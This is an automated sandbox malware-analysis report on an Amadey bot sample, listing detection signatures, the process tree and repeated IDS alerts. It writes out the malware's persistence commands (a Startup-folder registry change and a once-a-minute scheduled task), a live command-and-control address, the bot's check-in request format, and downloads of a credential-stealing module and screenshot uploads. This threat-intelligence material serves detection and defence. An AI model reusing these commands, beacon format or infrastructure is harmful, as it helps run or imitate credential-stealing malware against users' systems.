Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yIF7nMz573.exe

Overview

General Information

Sample Name:yIF7nMz573.exe
Analysis ID:652395
MD5:dce2a8f4ab60879898a21ab451cad63f
SHA1:c889640843424e5ee1c6a7e31d25e3fa510b846b
SHA256:2be50564951116ca5ac96158abdb936b6d5bd35794330371131f4117223cdd26
Tags:Amadeyexe
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses reg.exe to modify the Windows registry
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • yIF7nMz573.exe (PID: 6472 cmdline: "C:\Users\user\Desktop\yIF7nMz573.exe" MD5: DCE2A8F4AB60879898A21AB451CAD63F)
    • bguuwe.exe (PID: 6608 cmdline: "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" MD5: DCE2A8F4AB60879898A21AB451CAD63F)
      • cmd.exe (PID: 6764 cmdline: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6816 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • schtasks.exe (PID: 6784 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • bguuwe.exe (PID: 6960 cmdline: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe MD5: DCE2A8F4AB60879898A21AB451CAD63F)
  • bguuwe.exe (PID: 6504 cmdline: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe MD5: DCE2A8F4AB60879898A21AB451CAD63F)
  • cleanup
{"C2 url": "185.215.113.15/Lkb2dxj3/index.php", "Version": "3.21"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    No Sigma rule has matched
    Timestamp:192.168.2.3185.215.113.1549746802027700 06/26/22-09:46:57.610393
    SID:2027700
    Source Port:49746
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549749802027700 06/26/22-09:47:01.350218
    SID:2027700
    Source Port:49749
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549798802027700 06/26/22-09:47:41.864054
    SID:2027700
    Source Port:49798
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549832802027700 06/26/22-09:48:33.213243
    SID:2027700
    Source Port:49832
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549755802027700 06/26/22-09:47:21.773924
    SID:2027700
    Source Port:49755
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549826802027700 06/26/22-09:48:24.530301
    SID:2027700
    Source Port:49826
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549829802027700 06/26/22-09:48:27.114493
    SID:2027700
    Source Port:49829
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549841802027700 06/26/22-09:48:43.294919
    SID:2027700
    Source Port:49841
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549780802027700 06/26/22-09:47:27.628822
    SID:2027700
    Source Port:49780
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549767802027700 06/26/22-09:47:22.040844
    SID:2027700
    Source Port:49767
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549761802027700 06/26/22-09:47:20.297421
    SID:2027700
    Source Port:49761
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549801802027700 06/26/22-09:47:44.118576
    SID:2027700
    Source Port:49801
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549776802027700 06/26/22-09:47:25.997227
    SID:2027700
    Source Port:49776
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549810802027700 06/26/22-09:47:57.512185
    SID:2027700
    Source Port:49810
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549773802027700 06/26/22-09:47:23.164370
    SID:2027700
    Source Port:49773
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549758802027700 06/26/22-09:47:18.795200
    SID:2027700
    Source Port:49758
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549782802027700 06/26/22-09:47:29.252532
    SID:2027700
    Source Port:49782
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549756802027700 06/26/22-09:47:13.646635
    SID:2027700
    Source Port:49756
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549785802027700 06/26/22-09:47:30.265752
    SID:2027700
    Source Port:49785
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549828802027700 06/26/22-09:48:25.611929
    SID:2027700
    Source Port:49828
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549816802027700 06/26/22-09:48:09.646530
    SID:2027700
    Source Port:49816
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549845802027700 06/26/22-09:48:46.784890
    SID:2027700
    Source Port:49845
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549774802027700 06/26/22-09:47:24.256337
    SID:2027700
    Source Port:49774
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549839802027700 06/26/22-09:48:37.748469
    SID:2027700
    Source Port:49839
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549797802027700 06/26/22-09:47:41.469763
    SID:2027700
    Source Port:49797
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549817802027700 06/26/22-09:48:11.724189
    SID:2027700
    Source Port:49817
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549786802027700 06/26/22-09:47:30.623905
    SID:2027700
    Source Port:49786
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549745802027700 06/26/22-09:46:54.779771
    SID:2027700
    Source Port:49745
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549757802027700 06/26/22-09:47:16.401762
    SID:2027700
    Source Port:49757
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549823802027700 06/26/22-09:48:17.269325
    SID:2027700
    Source Port:49823
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549751802027700 06/26/22-09:47:05.409898
    SID:2027700
    Source Port:49751
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549781802027700 06/26/22-09:47:28.674122
    SID:2027700
    Source Port:49781
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549805802027700 06/26/22-09:47:48.812945
    SID:2027700
    Source Port:49805
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549775802027700 06/26/22-09:47:25.180668
    SID:2027700
    Source Port:49775
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549803802027700 06/26/22-09:47:47.323846
    SID:2027700
    Source Port:49803
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549812802027700 06/26/22-09:47:59.897990
    SID:2027700
    Source Port:49812
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549806802027700 06/26/22-09:47:54.097536
    SID:2027700
    Source Port:49806
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549784802027700 06/26/22-09:47:30.001407
    SID:2027700
    Source Port:49784
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549787802027700 06/26/22-09:47:30.877538
    SID:2027700
    Source Port:49787
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549793802027700 06/26/22-09:47:39.471421
    SID:2027700
    Source Port:49793
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549796802027700 06/26/22-09:47:40.783332
    SID:2027700
    Source Port:49796
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549799802027700 06/26/22-09:47:42.867694
    SID:2027700
    Source Port:49799
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549830802027700 06/26/22-09:48:30.483127
    SID:2027700
    Source Port:49830
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549818802027700 06/26/22-09:48:13.810900
    SID:2027700
    Source Port:49818
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549744802027700 06/26/22-09:46:53.237130
    SID:2027700
    Source Port:49744
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549815802027700 06/26/22-09:48:05.618223
    SID:2027700
    Source Port:49815
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549842802027700 06/26/22-09:48:44.262889
    SID:2027700
    Source Port:49842
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549791802027700 06/26/22-09:47:37.619364
    SID:2027700
    Source Port:49791
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549824802027700 06/26/22-09:48:18.293793
    SID:2027700
    Source Port:49824
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549833802027700 06/26/22-09:48:36.596810
    SID:2027700
    Source Port:49833
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549750802027700 06/26/22-09:47:03.761613
    SID:2027700
    Source Port:49750
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549809802027700 06/26/22-09:47:55.667044
    SID:2027700
    Source Port:49809
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549825802027700 06/26/22-09:48:19.702891
    SID:2027700
    Source Port:49825
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549788802027700 06/26/22-09:47:31.215612
    SID:2027700
    Source Port:49788
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549794802027700 06/26/22-09:47:42.618057
    SID:2027700
    Source Port:49794
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549753802027700 06/26/22-09:47:07.860735
    SID:2027700
    Source Port:49753
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549747802027700 06/26/22-09:46:59.493020
    SID:2027700
    Source Port:49747
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549813802027700 06/26/22-09:48:02.729973
    SID:2027700
    Source Port:49813
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549765802027700 06/26/22-09:47:21.494001
    SID:2027700
    Source Port:49765
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549742802027700 06/26/22-09:46:52.260106
    SID:2027700
    Source Port:49742
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549777802027700 06/26/22-09:47:26.632947
    SID:2027700
    Source Port:49777
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549783802027700 06/26/22-09:47:29.721183
    SID:2027700
    Source Port:49783
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549790802027700 06/26/22-09:47:31.866868
    SID:2027700
    Source Port:49790
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549802802027700 06/26/22-09:47:45.689140
    SID:2027700
    Source Port:49802
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549789802027700 06/26/22-09:47:31.596641
    SID:2027700
    Source Port:49789
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549754802027700 06/26/22-09:47:11.567118
    SID:2027700
    Source Port:49754
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549795802027700 06/26/22-09:47:39.970739
    SID:2027700
    Source Port:49795
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.3185.215.113.1549820802027700 06/26/22-09:48:15.889921
    SID:2027700
    Source Port:49820
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: yIF7nMz573.exeVirustotal: Detection: 36%Perma Link
    Source: yIF7nMz573.exeReversingLabs: Detection: 46%
    Source: http://185.215.113.15/Lkb2dxj3/cred.dllAvira URL Cloud: Label: malware
    Source: http://185.215.113.15/Lkb2dxj3/index.php?scr=1Avira URL Cloud: Label: malware
    Source: http://185.215.113.15/Lkb2dxj3/index.phpAvira URL Cloud: Label: malware
    Source: 185.215.113.15/Lkb2dxj3/index.phpAvira URL Cloud: Label: malware
    Source: http://185.215.113.15/Lkb2dxj3/cred.dllVirustotal: Detection: 10%Perma Link
    Source: http://185.215.113.15/Lkb2dxj3/index.php?scr=1Virustotal: Detection: 16%Perma Link
    Source: http://185.215.113.15/Lkb2dxj3/index.phpVirustotal: Detection: 8%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeReversingLabs: Detection: 46%
    Source: yIF7nMz573.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeJoe Sandbox ML: detected
    Source: 10.2.bguuwe.exe.ca0e67.1.raw.unpackMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.15/Lkb2dxj3/index.php", "Version": "3.21"}

    Compliance

    barindex
    Source: C:\Users\user\Desktop\yIF7nMz573.exeUnpacked PE file: 0.2.yIF7nMz573.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeUnpacked PE file: 10.2.bguuwe.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeUnpacked PE file: 19.2.bguuwe.exe.400000.0.unpack
    Source: yIF7nMz573.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\yIF7nMz573.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
    Source: Binary string: 4C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdbhQE source: yIF7nMz573.exe, bguuwe.exe.0.dr
    Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: bguuwe.exe, bguuwe.exe, 0000000A.00000003.309573312.0000000002680000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 0000000A.00000002.310851152.0000000000400000.00000040.00000001.01000000.00000004.sdmp, bguuwe.exe, 00000013.00000003.436338971.0000000001010000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 00000013.00000002.437486522.0000000000400000.00000040.00000001.01000000.00000004.sdmp
    Source: Binary string: C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdb source: yIF7nMz573.exe, bguuwe.exe.0.dr
    Source: C:\Users\user\Desktop\yIF7nMz573.exeCode function: 0_2_004244D2 FindFirstFileExW,
    Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exeCode function: 10_2_004244D2 FindFirstFileExW,

    Networking

    barindex
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49742 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49744 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49745 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49746 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49747 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49749 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49750 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49751 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49753 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49754 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49756 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49757 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49758 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49761 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49765 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49755 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49767 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49773 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49774 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49775 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49776 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49777 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49780 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49781 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49782 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49783 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49784 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49785 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49786 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49787 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49788 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49789 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49790 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49791 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49793 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49795 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49796 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49797 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49798 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49794 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49799 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49801 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49802 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49803 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49805 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49806 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49809 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49810 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49812 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49813 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49815 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49816 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49817 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49818 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49820 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49823 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49824 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49825 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49826 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49828 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49829 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49830 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49832 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49833 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49839 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49841 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49842 -> 185.215.113.15:80
    Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49845 -> 185.215.113.15:80
    Source: Malware configuration extractorURLs: 185.215.113.15/Lkb2dxj3/index.php
    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: GET /Lkb2dxj3/cred.dll HTTP/1.1Host: 185.215.113.15
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3071f00e42adff16a6518745df4c3290Host: 185.215.113.15Content-Length: 95417Cache-Control: no-cache
